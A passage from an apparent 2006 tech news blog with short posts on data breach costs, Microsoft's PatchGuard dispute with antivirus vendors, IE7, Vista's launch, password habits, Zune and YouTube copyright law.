- Five (16%) are encrypting data at rest.
- Four (13%) have installed information leak detection and prevention systems.
- Three (10%) have deployed security event management systems.
- Another three (10%) have put up additional perimeter controls.
- Two (6%) have launched identity and access management systems.
- Another two have conducted independent security audits.
- Two companies have done nothing.
- One company has stated encrypting data backups.
Copies of the "2006 Cost of a Data Breach Study" are available through PGP, Vontu, and The Ponemon Institute.
What do you find most striking about this studies findings -- if anything?
Posted by Ted Samson on October 20, 2006 05:52 PM
October 20, 2006 | Comments: (0)
A turkey: Canada gets Vista 1st, eh?
It's official: Microsoft is going with the Canada-first strategy. Eagle-eyed Microsoft observers cruising the Canadian Microsoft Developer Network site on Friday spotted the announcement that Vista, Office 2007 and Exchange Server 2007 will be introduced at an Edmonton launch event on Nov. 23.
That's Thanksgiving in the US, but not in the Great White North, which gives thanks the second Monday in October. So assuming the site has it right, Microsoft is slipping into the continent from the north, giving Canada a first official look, even as most Americans are nursing themselves out of a Tryptophan coma. Smart money, then, is that the US launch will follow hot on the heels of Canada, probably the next Monday, Nov. 27.
This is all speculation, since MS has been coy about coughing up a US launch date. Still Redmond has been touting a November introduction Stateside, and the Canada launch indicates the pieces are indeed ready. Of course, you won't be able to actually get the disks until January or so, as MS stuffs the channel with product.
But a launch is a launch. Even if it is on Turkey Day.
Posted by Steve Fox on October 20, 2006 05:20 PM
October 20, 2006 | Comments: (0)
Fed gets D+ for weak data security
If the federal government was a college student, it would be on academic probation right now for a near-failing grade in Data Security 101.
In a report released last Friday, the Government Reform Committee slapped the feds with a pathetic D+ for its appalling track-record in adequately protecting U.S. citizens' personal data since 2003.
All 19 federal departments have suffered at least one data breach since 2003, according to the committee's report, which goes into quite some detail about the number of data breaches suffered by each department, including specific dates and incidences. (You can download the report here.)
According to the report, the Dept. of Veteran Affairs reported the most "incidents involving the loss or compromise of any sensitive personal data." The report didn't offer a specific number, just "hundreds." Next was the Dept. of Treasury, with 340 incidents. Third was the Dept. of Commerce with 297. The Dept. of Defense reported 43; the Dept. of Education, 41, and the Dept. of Health and Human Services have 24. The remaining departments each reported fewer than 10.
Perhaps even more troubling: It's possible that your information was swiped from a government database, and you don't even know it. According to the report, "agency responses to data losses appear to vary ... with some notifying all potentially affected individuals, and others not performing such notifications."
The thing is, they're not required to let you know if some malicious hacker makes off with your name, address, and Social Security number: "Despite the volume of sensitive information held by agencies, there is no requirement that the public be notified if their sensitive personal information is compromised," the report says.
Among the committee's overall findings:
Agencies do not always know what has been lost. "In many cases, agencies do not know what information has been lost or how many individuals could be impacted by a particular data loss. Similarly, agencies do not appear to be tracking all possible losses of personal information, making it likely that their reports to the committee are incomplete."
Physical security of data is essential. "Only a small number of the data breaches reported to the Committee were caused by hackers breaking into computer systems online. The vast majority of data losses arose from physical thefts of portable computers, drives, and disks, or unauthorized use of data by employees."
Contractors are responsible for many of the reported breaches. "Federal agencies rely heavily on private sector contractors for information technology management services. Thus, many of the reported data breaches were the responsibility of contractors."
Conspicuously absent from the 15-page report, however: a single recommendation of how to deal with the problem. In other words, the committee does a great job describing just how hot the fire is in the burning house, what might have caused it, and how many residents are trapped inside. But apparently someone else will need to come up with ideas on how to put it out. Ah, government inaction.
Of course, data breaches don't just affect the government. Businesses -- and as a result, their customers and employees -- continue to fall victim to data theft. Yet aside from offering a year of free credit monitoring, companies appear to be moving at a glacial pace to address the problem.
Trouble is, until we see some compliance legislation forcing companies to better protect users' private data, there's no real incentive for them to invest the time and money toward, perhaps, exploring encryption technology, improving security measures to limit what kind of data employees can carry around, and keeping a better tab on how partners are handling your sensitive data.
But there's really no excuse for the government not to get its act together, and to do it now. If the data of citizens, including veterans, is so easily accessible, who knows what other information malicious hackers and thieves might have access to. Securing our nation isn't just limited to having well-trained soldiers on the border, state-of-the-art jets in the sky, and satellites in space keeping tabs on enemies; not in the Internet Age.
Unfortunately, this hasn't become an election-year issue, so it's not garnering the attention it deserves from the powers-that-be. I recommend taking a moment to send a letter to your local reps, citing this report and telling them to do something about it now.
Or am I overreacting? Is the government doing enough to keep our data safe? What's the answer here? There's an interesting discussion group going on right now in InfoWorld's IT Exec-Connect community where this topic could be expanded on further.
Posted by Ted Samson on October 20, 2006 01:44 PM
October 20, 2006 | Comments: (0)
On Wednesday night, October 18th, the night Microsoft released IE 7, they invited a bunch of reporters and numerous, supposedly independent, A-list bloggers for an informal gathering to meet the IE 7 development team.
While I am skeptical by nature, and the evening did nothing to allay my natural inclinations, I did find a few of the conversations with the technocrats of the World Wide Web very enlightening.
First, why was I was doubtful about getting honest opinions from the bloggers about IE 7?
Well, it was unclear if all of the local blogger stars were invited or were the only invitees handpicked by Microsoft knowing they were friendly to the cause.
I didn’t get an answer to that but I do know the responses to questions were all highly positive. One in particular stands out, asking one blogger how would he compare IE 7 to Firefox's about to be released version, he responded. "I would rather compare 7 to IE 6, in which case the difference is phenomenal."
Give me a break.
Another blogger chimed in saying IE 7 is so good he may switch back.
There weren't many bloggers who showed up but at least two of the half dozen that were there in the first hour and a half of the evening were former Microsoft employees.
Nevertheless, my conversation with Tantek Celik, chief technologist and A-list blogger at Technorati was good.
Celik [there should be a cedilla under the C in Celik]is the creator of an XML framework called microformat.
Microformats offer a unique way to exchange and publish different types of information. It can take text, images in different formats and map it correctly inside a users current application.
For example, a Web site might display a company's address, phone number, name of CEO, etc. If a microformat was used, with one click it could be placed inside Outlook contacts rather than having to cut and paste.
"If it is on one site you can syndicate it to another site," Celik added.
Two microformats are now avaialble, HCal and Hcard.
On the topic of IE 7, Celik said that Microsoft has adhered much closer to current browser standards which means a developer writing for Firefox, Opera, or Safari would have very little to recode in order for it to run on IE 7.
He added that Microsoft has improved the browser engine and fixed a ton of bugs.
Another A-List blogger and Web site entrepreneur attending was Gabe Rivera. Rivera's Techmeme.com site is the place to go to keep abreast of tech news.
Rivera aggregates the best of the best blogs. But he also offers what he smilingly calls a "sponsored" site and that's how he makes money.
Using RSS, Techmeme takes blogs from sponsoring companies. The companies can control what blog gets on Techmeme simply by making the one they want to promote the most current on their own site.
Rivera was hot on IE 7, saying he liked the tab-based browsing and the lack of memory problems that were resident in IE 6. Rivera is the guy who may switch back.
However, he also likes a Mozilla Firefox addon called Flash Blocker saying it was terrific.
Dean Hachamovitch, general manager of the IE development team is championing the new addon site within IE 7.
Addons created for use in IE 7 are now organized in a single place with what Hachamovitch called a simple submission process.
At present there are 400 addons in the addons.com site.
With hundreds of millions of users, 400 addons seemed a bit paltry I said. His response was non-committal only explaining how useful the current group is.
I also spoke with Kristopher Tate, founder of Zooomr.com.
Tate's site aggregates photos and the site also deploys Celik's microformats for publishing pictures.
Microformats help Tate give users the ability to publish pictures in what he called a social network which puts the photo in contexts like time, place, and relationships.
Niall Kennedy told me what he likes about IE 7 is the improved Web handling and the addition of auto complete when typing.
Kennedy also likes the fact that RSS is built right into the platform so you can aggregate and subscribe to feeds and an icon lets you know when an RSS is available. There is also a Restore Session capability that brings you back to your Windows after a crash and shut down.
IE 7, said Kennedy also supports spell check in Web mail.
Celik had the final word.
When asked why is IE 7 so important to Microsoft since they don't make a dime on it Celik said Windows is at stake and Microsoft makes a lot of money from that.
Windows is not the only OS in the market and it is up to Microsoft to prove it is the best. Since browsing is where most users live nowadays, as IE 7 goes so goes the franchise.
Posted by Ephraim Schwartz on October 20, 2006 01:14 PM
October 20, 2006 | Comments: (0)
Internet addiction is the latest "hot topic" in the social research crowd. Exhibit 1 is a new study out from the Stanford University School of Medicine that suggests there are similarities between Internet addiction and alcoholism, with 8 percent of the 2,500 people surveyed admitting they hid Internet use from family members. ("Hello, my name is Paul, and I'm an Internet addict.") So if you find a little WAP tucked into your spouse's closet, now you know why. ;-)
On a more personal note this week, there have also been duelling accounts of the salutary (or is it deleterious) effects of World of Warcraft, the massively popular massive multiplayer online rollplaying game (MPMMORPG) that counts none other than Bill Gates as a devotee.
First, on Tuesday, there was this soul bearing from a "council member on one of the oldest guilds" in World of Warcraft's virtual world. According to this person, "Andy" who has been playing the game for 30 hours a week for an entire year. At what cost? According to Andy, he put on about 30 pounds, lost most of his friends and generally withdrew from the "real world" in favor of his farming and guilding responsibilities in WoW. Typical of the post is a passage like this one:
"I remember clearly after fumbling around life for a few weeks that I dragged myself into the bathroom to get ready for work. I was tired because I was up until close to 2 AM raiding. Every week I read though email or I would run into one of my "real" friends and I'd hear "Andy, what's up, I haven't seen you in a while." I looked in the mirror and in a cinemaesque turn of events and a biblical moment of clarity, told myself "I haven't seen me in a while either"
But hey, at least this guy was single and unemployed...
"The worst though are the people you know have time commitments. People with families and significant others. I am not one to judge a person's situation, but when a father/husband plays a video game all night long, seven days a week, after getting home from work, very involved instances that soak up hours and require concentration, it makes me queasy that I encouraged that. Others include the kids you know aren't doing their homework and confide in you they are failing out of high school or college but don't want to miss their chance at loot, the long-term girl/boyfriend who is skipping out on a date (or their anniversary - I've seen it) to play (and in some cases flirt constantly), the professional taking yet another day off from work to farm mats or grind their reputations up with in-game factions to get "valuable" quest rewards, etc... I'm not one to tell people how to spend their time, but it gets ridiculous when you take a step back."
That post produced a whole lot of comment and "me too" stories, not to mention some backlash like:
"2 characters 2 years 60th & 49th level 8 hours a week at the most. Seriously, balance is easily achieved. If you do so, you don't have to get burnt out on it." (How many of us haven't heard that line from our boozing friends?)
A more thorough response, on the same blog, came this response from a fellow guild member in favor of WoW.
The main argument seems to be that in WoW you can: 1) meet cool people you wouldn't otherwise meet and make friends, 2) practice being a better human. No kidding. Consider the following passage from the "Pro" camp:
"I got a Masters degree in policy from one of the most difficult schools in the country while at the same time playing WoW and working a part time job. I would come home from a busy day and think about how to use what I learned to make the guild work better."
Or:
"I like being the very best player I can be; whether I'm playing a priest or a mage or a twink druid, you can bet that I'm crunching numbers and reading theory and strategy and trying to make every action or every cast more efficient."
To which I say, "Twink druid???"
Honestly, speaking as someone who enjoys PC gaming, but never bought into the whole WoW thing, just listening to these two dudes debate whether WoW is addictive and harmful at least convinces me how seductive and consuming the game must be. I mean, these guys are totally checked out!
How about this little gem from the Con camp:
"I miss at least one raid a week to go out with friends, go clubbing, or watch a movie with my family. I hardly ever farm. I usually play the auction-house for fifteen minutes before I go to bed at night. I actually gave up herbalism because I didn’t have time for it (and I wanted to DE the stuff my ex gave me when we broke up >.>). If I start feeling frustrated, that the demands of people in the game are getting to high, or that I don’t have anything else to do … I walk away. I go for a walk, pursue one of my other hobbies, or call a friend. Soon enough I’m happy to come back, because I enjoy it and because there are people in the game whom I love and who make it worthwhile for me to play."
Anyone who considers squeezing a hour or two of "reality" around his day job and a fantasy roll playing game moderation is off the reservation. IMHO.
Diagnosis: Dude, you're hooked!
Posted by Paul Roberts on October 20, 2006 11:56 AM
October 20, 2006 | Comments: (0)
Microsoft AV talks go 'Jerry Springer'
Microsoft's talks with the antivirus industry over ways to circumvent its PatchGuard kernel protection technology have turned from chilly to ugly faster than a pair of cheating lovers on Jerry Springer.
Microsoft proposed the talks last week, after agreeing to turn over APIs for supressing Vista features like the Security Center management console and to discuss ways to help the companies get around kernel patch protections in 64 bit versions of Windows.
The company was under pressure from the European Commission, which had sent signals that it was worried Vista's security features would stifle innovation in the field.
Microsoft has long maintained that it would not allow patches to the 64 bit Windows kernel, saying that it was bad practice and that there was no way to do it without also providing an avenue for hackers to do the same. Symantec, McAfee and other vendors charge that kernel patching is vital to behavioral detection products and other next generation security tools.
By all accounts, the meeting, Thursday morning, got off to a rocky start. According to Microsoft Security guru Stephen Toulouse, the company "had a glitch where we sent out a messed up link. People joining using the link resulted in basically the first attempt at the meeting folding and we had to scramble to set it up again."
In the end, 20 ISV were able to attend, though many representatives from Symantec were not able to join in, according to spokesman Cris Paden. Another meeting was scheduled for Thursday evening, and a follow-up meeting has been set for Monday, also, according to Toulouse's blog.
Meeting or no meeting, it seems like AV vendors weren't in a mood to wait around for the talks to conclude before unloading on Microsoft. Suggestions were flying shortly after the technical gaffe that it was a deliberate attempt to shut Microsoft's harshest critics out of the discussions.
McAfee issued a public statement Thursday evening, attribted to Christopher Thomas of Lovells, McAfee's outside litigation counsel in Brussels, saying the company has "seen little indication that Microsoft intends to live up to the promises it made last week."
"We have been greatly disappointed by the lack of action by the company so far and Microsoft has not lived up, either in detail or in spirit, to the hollow assurances offered by their top management last week,” Thomas was quoted saying.
Microsoft shot back early Friday, with a statement attributed to Security Technology Unit Vice President Ben Fathi, noting specific dates and times on which Microosft had sent documentation and sample code for allowing third party companies to control Security Center alerts.
"On the longer-term issue of working with the industry to develop additional APIs and interfaces beyond what is available already today on x64bit with Kernel Patch Protection," Fathi said "These discussions are underway between our engineering teams and our third-party security partners about the functionality they are seeking, and how to prioritize this significant work in the months ahead."
Which brings us to the nub of the issue here -- Despite news reports to the contrary last week, Microsoft never really gave ground on the PatchGuard issue and it doesn't look like they intend to now. Fathi, Toulouse and others are saying what Microsoft has always said: they'd work with ISVs to define the functionality they want and look for ways to extend the Vista kernel to accomodate them. Allowing runtime patching of the kernel, however, is a no-go. Moreover, designing and building the APIs that the security vendors are looking for will take time -- certainly more time than vendors have before Vista hits the street.
As Toulouse himself blogged, shortly after news broke of the "compromise" with AV players: "I want to be crystal clear on this: We have not changed the implementation of or our commitment to Kernel Patch Protection in Windows Vista for x64bit systems. It’s still there, it’s not going to be turned off or have blanket exceptions granted for it." Period. Now stand up so I can throw this chair at you!
To be honest, Microsoft's line on PatchGuard has always sounded believable to me. Runtime kernel patching is a "don't try this at home" type of activity, and allowing ISVs to do it would seem to open the 64 bit platform up to the kind of spy vs. spy games that AV companies play with rootkit authors on 32 bit platforms -- with predictable results.
Microsoft just received an important endorsement for that position from rootkit author and researcher Joanna Rutkowska, who wrote on her Invisible Things blog that PatchGuard shouldn't necessarilly be thought of as a security feature, and won't stop some classes of malicious programs from subverting the kernel protections. What it will do is make it a lot easier to spot and block kernel level hooking, by assuring that legitimate programs are not using that technique. Therefore any program that is trying to hook the operating system kernel must be illegitimate.
Not that Rutkowska's opinions will make much difference. The fact that McAfee is already issuing statements through counsel in the EU is a sign of where this debate is going. Namely: direct to the antitrust officials in Brussels. There may have been no way around this, given how hard Symantec and McAfee have promised to fight to protect their markets. But Microsoft certainly didn't make life easier on itself by withholding any information -- APIs, documentation, whatever -- in a way that could be construed as anticompetitive.
Hold on to your hats, and watch the flying chairs -- this fight's going to be a doozy!
Posted by Paul Roberts on October 20, 2006 08:54 AM
October 19, 2006 | Comments: (0)
MS's 'hollow assurances' rile McAfee
updated | Intentionally or not, Microsoft's making life a bit difficult, and stressful, for third-party security software vendors.
Addressing concerns from companies such as McAfee and Symantec who assert that 64-bit Vista won't support their security wares, the Big Redmondian Machine today said that it would make necessary changes to the OS -- eventually, according to reports.
The non-committal timetable can't be too heartening to the desktop-security industry as Vista's release date draws ever closer.
In fact, McAfee today released the following statement: "Despite pledges, press conference and speeches by Microsoft, the community of independent security companies that consumers rely on for computer protection has seen little indication that Microsoft intends to live up to the promises it made last week," said Christopher Thomas, a partner at Lovells which is presently serving as McAfee's outside litigation counsel in Brussels.
"We have been greatly disappointed by the lack of action by the company so far and Microsoft has not lived up, either in detail or in spirit, to the hollow assurances offered by their top management last week," Thomas said.
The statement came out the same day Microsoft attempted to host an online briefing for security ISVs, the purpose of which was to respond to complaints from Symantec and McAfee about 64-bit Vista's protective PatchGuard kernel that keeps the OS from playing nicely with third-party malware-fighting arsenals. But some vendors who attempted to participate were inadvertently locked out, according to BetaNews -- including the aforementioned Symantec and McAfee. Microsoft took responsibility for the glitch, though, and the meeting was rescheduled.
Notably, Microsoft has handed over API code to security vendors, which would allow them to disable the Security Center management console that will ship with Vista. But that doesn't address the problems with PatchGuard.
"Although PatchGuard is not used by Vista when it is running in 32-bit mode, it will lock many types of software, including Symantec's, out of the kernel on 64-bit versions of the operating system. The security vendors wanted Microsoft to give them some way to access the 64-bit kernel, saying that this high-level access was required in order to activate critical security features," IDG News Service writes.
This turn of events is at least scoff-worthy to the average tech cynic and great fodder for a conspiracy theorist. What if Microsoft was intentionally dragging its feet here so as to give itself an advantage by forcing its suite to be the desktop security tool of "choice" for its own operating system? That would certainly negatively impact the bottom lines of third-party vendors. Not that Microsoft would engage in arguably monopolistic behavior, of course. What's with these conspiracy theorists? Still, Microsoft could see an advantage in all this.
Then again, these events may very well give organizations further reason to delay Vista deployment. Yes, Microsoft has made a number of grandiose promises about Vista's enhanced security, but given the company's shoddy security track record, some shops may want to put Vista on hold until they can install anti-malware offerings from a more trusted vendor.
And speaking of Microsoft security, a vulnerability has already been found in Internet Explorer 7, which was released yesterday.
I'm just sayin'.
What do you think? Is Microsoft playing fairly? Will you deploy Vista before the company fixes PatchGuard to work well with third-party security tools?
Posted by Ted Samson on October 19, 2006 03:41 PM
October 19, 2006 | Comments: (0)
Motorola: Metro Wi-Fi'll never happen
In writing my column about WiMAX that will be online next week I spoke with Juan Santiago, senior director of product management at Motorola.
We were talking about Wi-Fi versus WiMAX and I found one of his comments about Wi-Fi both interesting and enlightening.
Enlightening because as so many in high tech they put down what was once touted as the next great technology in order to promote their own.
Santiago dismissed Metro Wi-Fi as an attempt, he as much as said it was a feeble attempt, to take Wi-Fi outdoors. According to Santiago Metro Wi-Fi, "hasn't happened."
Among Santiago's reasons are because it is unlicensed, free, there are too many devices out there creating too much interfence to make it usable.
Secondly, it would be too costly to support and maintain outdoor
Wi-Fi. Reason being, to get coverage similar to cellular requires too many access points because of Wi-Fis short range.
"If the municipalities didn’t subsidize [Metro Wi-Fi] the business case falls apart."
Santiago went on to say that the only reason the business case works is there is a tit-for-tat with municipalities, in which they get free access to the infrastructure like the light posts.
I guess the word subsidized is an anathema to a commercial concern but not everything has to be commercial. Isn't garbage collection, fire protection and police subsidized by city government, too? Isn't that why we pay taxes?
I suggest if WiMAX is so much better why doesn't Motorola donate the infrastructure to a municipality and show us all how to do it right.
Posted by Ephraim Schwartz on October 19, 2006 03:20 PM
October 19, 2006 | Comments: (0)
U.S. universities should focus on cooler topics as they try to attract more students to the engineering profession, according to MIT President Charles Vest.
Vest said that focusing on nano-science and large systems offer "mind-boggling possibilities" and "daunting challenges," and will draw more students into the engineering field.
Vest made the comments during a lecture "Educating Engineers for 2020 and Beyond," at MIT's Bartos Theater , in an address Oct. 12 as part of the Brunel Lecture Series on Complex Systems, which was hosted by the Engineering Systems Division at MIT.
Nano-scale projects at MIT like batteries constucted out of viruses and the study of large scale systems like transportation and the environment will keep MIT on the cutting edge, and draw more young students into the field, Vest said.
"As we think about the challenges ahead, it's important to remember that students are driven by passion, curiosity, engagement and dreams," Vest told a standing-room-only audience.
Vest also told the audience, in so many words, that engineering programs should do more to help their students get a life.
Too much focus on individual study and core engineering coursework doesn't prepare students for "an ever-evolving social, political and economic context," said Vest.
Engineering programs should focus more on group work, team projects, research and exprimental learning, and less on lectures.
21st century engineers will need communication skills and an understanding of ethics and social responsibility, business organization, innovation and product development. So it's not a bad idea to take a few humanities courses while you're at it, Vest said.
A number of recent reports have warned that problems in the U.S. education system and a lack of investment in basic research are eroding the country's lead in the engineering and the sciences.
Posted by Paul Roberts on October 19, 2006 01:09 PM
October 19, 2006 | Comments: (0)
We've heard the rumors: Software is on the way out, the industry is dying, yada, yada, yada. Well, hold the rumors. Deloitte just pumped out its 12th annual "2006 Technology Fast 500" list, a daunting compendium purporting to identify the fastest growing tech companies in North America. And -- surprise! -- just as in years past, the list is dominated by software vendors: 179 of 'em. Add the 60 entries listed under the rubric "Internet" (essentially software by another name) and software industry might even seem robust. Sheer bulk aside, however, telecom looks like the place to be, with the greatest percentage revenue growth over all.
Still, you've got to take these kinds of self-serving surveys with a grain of salt … and maybe a pitcher of margaritas to boot. More than half of these companies are privately held, so there's limited visibility into their actual finances. Even if the top line for company X grew by 1000 percent, who's to say that their costs didn't go up even faster. More telling, the list is based on five-year revenue growth percentage. A large percentage of a small number is still a small number. Company no. 10, Antenna Software ("real-time mobility solutions"), grew revenue more than 16,000 percent, from $61,000 to $9,852,000. Sounds impressive, but that would be a rounding error for Google (no. 41). Nonetheless, Antenna will get to issue a press release, as will IT consultancy Vaptech ($5 million in revenues). That's got to be worth something.
There aren't all that many whizzy, collaborative Web 2.0 plays here, probably because companies have to have been around for five years and show revenue progress. Let's look back in a few years. But there are a boatload of on-demand software-as-a-service providers, which take advantage of Web 2.0-ish browser functionality. Even so, the software list is dominated by frumpy old apps, IT consulting services, and vertical offerings catering to health care and the like. Somehow I find that comforting.
Posted by Steve Fox on October 19, 2006 04:00 AM
October 18, 2006 | Comments: (0)
Study: 1 in 3 put passwords to paper
System admins might want to take a long, deep breath before reading the findings of a recent research report about end-user passwords from Nucleus Technology.
Ready?
According to the survey, more than one in three enterprise users write down their passwords. And it gets worse: "Of the third of users that write down their passwords, one third of those do it on paper, such as a sticky note. Even more dangerous are the other two thirds: They keep their passwords as a text file on their laptop PC or mobile device, where it could be easily lost or stolen."
Whether you require complex passwords or basic ones; whether you require users to change them weekly or never; whether you use single sign-on or users have multiple passwords, the risk remains the same: according to the study, that same one-third-plus will continue jotting them down.
A total of 325 users participated in the survey by the way, which isn't an overwhelming number, but it's still enough to give you cause to revisit your organization's password policies and security measures.
"Companies that spend time and money creating password security strategies are largely wasting their time, because one in three employees are writing down passwords regardless of password policies," says David O'Connell, senior analyst at Nucleus Research. "It's like leaving the key under the mat or in the flower box. Companies looking to ensure security should look beyond passwords to other authentication strategies."
While educating users about password protection may help a bit, the study suggests that companies explore alternative means to traditional passwords. "Some companies look to biometrics to increase security," according to the study.
Nucleus Research is a global provider of IT advisory and research services. The study is available on free though the company's Web site.
How do you manage passwords at your company? Is biometrics the answer?
Posted by Ted Samson on October 18, 2006 11:17 PM
October 18, 2006 | Comments: (0)
MS' Zune no sweet tune in Hebrew
Microsoft's iPod killer, Zune, may sound like hip branding to some, but older Hebrew speakers will probably do a second take when they come across the players at Best Buy while shopping for Bar Mitzvah gifts.
The name for the device -- which will take on the Apple iPod when released later this year -- sounds like a vulgarity, specifically the "f" word, in Hebrew, IDG News' Jeremy Kirk reports.
Why do I say it may only offend older Hebrew speakers? Well, heard of fcuk, or French Connection? Microsoft may be going after just the same twist on the new cool in getting warm on the f-word with the youngins.
Kirk reports that the tech industry continually creates goofy product names, er Google, but the companies usually hire branding consultancies to extensively research product names, including translations in other language.
Seems Redmond had a day off on brand name research, but Hebrew linguists are divided over Zune anyway. Tsila Ratner, the head of Hebrew courses in the Department of Hebrew and Jewish Studies at University College London, says Zune is an unsuitable name for a product. However, Haggit Inbar-Littas, a 30-year veteran Hebrew teacher with the London Jewish Cultural Center, says while the name is "ridiculous" and close to the bad word, it's unlikely to be mistaken.
Microsoft breaks the controversy down to pronunciation. "While we do acknowledge the similarity in pronunciation to Hebrew zi-yun, that is not the intended meaning of the name Zune," according to a Microsoft statement.
Too late? Is Zune is dead in the water with this oversight? Talk back below.
Posted by Mike Barton on October 18, 2006 02:27 PM
October 18, 2006 | Comments: (0)
Expert talks 'GooTube', copyright
Everyone seems to be weighing in on whether legal problems stemming from copyright infringement will hobble YouTube and make Google's $1.65 billion buy a mistake.
To find out I called a top copyright infringement attorney Barry Cohen at Thorp Reed and Armstrong to see what he thought.
[Good thing he didn't charge by the hour because he kept me on the phone quite a while explaining the intricacies of copyright law.]
Cohen told me at the beginning of the conversation he believes there is no way Google would have made the buy before hiring legal experts on copyright to analyze what YouTube does.
Cohen says, "there is no doubt that there has been and will be copyright infringement" on YouTube and that technically it is illegal.
However, is YouTube and soon Google, liable for the copyright infringement?
There are two parts to the answer to this question.
Part one, according to the Digital Millennium Copyright Act [DMCA] there is something called Safe Harbor.
Safe harbor was put into the DMCA to protect ISPs. If, for example, Verio hosts a Web site that uses a copyrighted picture is Verio liable? Under Safe Harbor they are not.
"They are excluded under the DMCA Safe Harbor provision."
YouTube is already making an effort to qualify under Safe Harbor by implementing what is required of the provision, having a Take Down system in place.
Upon receiving notice from say NBC, as in the case of YouTube's having a full Saturday Night Live skit called Lazy Sunday on its site, they had a system in place to take down the skit immediately.
However, the law also requires that the service provider, like YouTube, was not aware of it and that they did not receive a direct benefit attributable to this material.
Is a site getting revenue from showing the infringed material, that is the question that the courts would ask.
The second part of the answer to the question of whether or not YouTube and Google are liable fom copyright infringement centers on what is called Fair Use.
Generally, under Fair Use you can refer to lyrics in say a Bruce Springsteen song if you are writing about Springsteen. Or you can show a short clip from 60 Minutes in history class. That is Fair Use, says Cohen.
In other words using it for criticism or comment.
However, at this point the only person who can decide if a piece of content falls under Fair Use is a judge.
"I could show a one minute clip of movie and a judge might say it is not fair use. It depends on the portion of the content you are taking it from, and context you are showing it in," said Cohen.
There are other challenges as well to copyright infringement. Say you are showing a ten minute video clip of a movie, while ten minutes qualifies under Fair Use, that clip might contain the full three minutes of a song. That would be clear infringement.
Finally, Cohen believes much of this will be settled by licensing agreements as YouTube already has with Universal. However, Cohen also warns that it is not safe to assume that just because it is helping a company's marketing effort to be on YouTube they might not litigate.
While the chances of YouTube suffering the fate of Napster are slim, it is possible, said Cohen.
Posted by Ephraim Schwartz on October 18, 2006 01:27 PM
October 18, 2006 | Comments: (0)